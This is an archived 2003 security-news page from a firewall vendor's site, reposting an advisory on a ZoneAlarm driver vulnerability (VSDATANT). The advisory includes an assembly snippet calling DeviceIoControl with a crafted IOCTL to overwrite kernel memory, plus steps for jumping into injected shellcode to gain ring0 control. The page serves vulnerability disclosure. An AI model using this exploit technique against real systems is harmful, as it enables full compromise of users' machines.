Protect your corporate IT network from hackers and other unwanted intruders with Proxy Sentinel™. Click here for all the details and get the peace of mind you deserve.
Back to our Homepage Proxy Sentinel™ high performance Internet proxy server and secure firewall solution Firewall Sentinel™ secure & powerful Internet firewall solution About Internet Security.ca and GCIS Frequently Asked Questions on Internet security issues Internet Security Industry News - Stay informed of what's happening Contact Internet Security.ca today and order your Proxy Sentinel™ or Firewall Sentinel™ server now!

Internet Security Industry News

Local ZoneAlarm Firewall Driver vulnerability
Save your company's valuable data with Proxy Sentinel™ from Internet Security. Click here for all the details.

August 6, 2003

Local ZoneAlarm Firewall (probably all versions - tested on v3.1). Device Driver vulnerability. ZoneAlarm is a very powerful and very common nowadays firewall for Windows produced by Zone Labs.II.

The driver installed with ZoneAlarm is vulnerable, and can be exploited in cause of that attacker can gain full system control (ring0 privileges). By sending properly formatted message to the ZoneAlarm Device Driver (VSDATANT - TrueVector Device Driver) you can cause an device driver memory overwrite.

Overview, sending faked buffers with specific singal can cause a miscellaneous code execution:

First signal should be send to overwrite specific memory location, in the current case it can be one of the case-if-statement.

push 0 ;overlapped
push offset bytes_returned ;bytes returned
push 4 ;lpOutBuffer size
push STATMENT_INSTRUCTION_POINTER ;memory to overwrite
push 0 ;lpInBuffer size
push 0 ;lpInBuffer
push 8400000fh ;guess what X-D
push vsdatant_handle ;device handle
call DeviceIoControl ;send it!

If the correct STATMENT_INSTRUCTION_POINTER will be put the address should be overwritten to 00060001h (example). After memory allocation at this address (inserting shellcode bla bla bla), the second signal must be send to jump into inserted code.

Click here to read the complete article on the Security Corp. website.

Save Internet Security.ca's URL to the list of your favorite web sites
in your Web browser by clicking here. Click here to order your Proxy Sentinel™ Internet security server today!

Proxy Sentinel™ is the most secure Internet proxy server on the market today. Click here for more information.
Site optimized by Pagina+™
Powered by Sun Hosting
Search engine keywords by Rank for Sales
Development platform by My Web Services
Internet Security.ca is listed in
Global Business Listing

| Home | Proxy Sentinel™ | Firewall Sentinel™ | FAQ | News | Sitemap | Contact |
Copyright © Internet Security.ca 2003    Terms of use    Privacy agreement    Legal disclaimer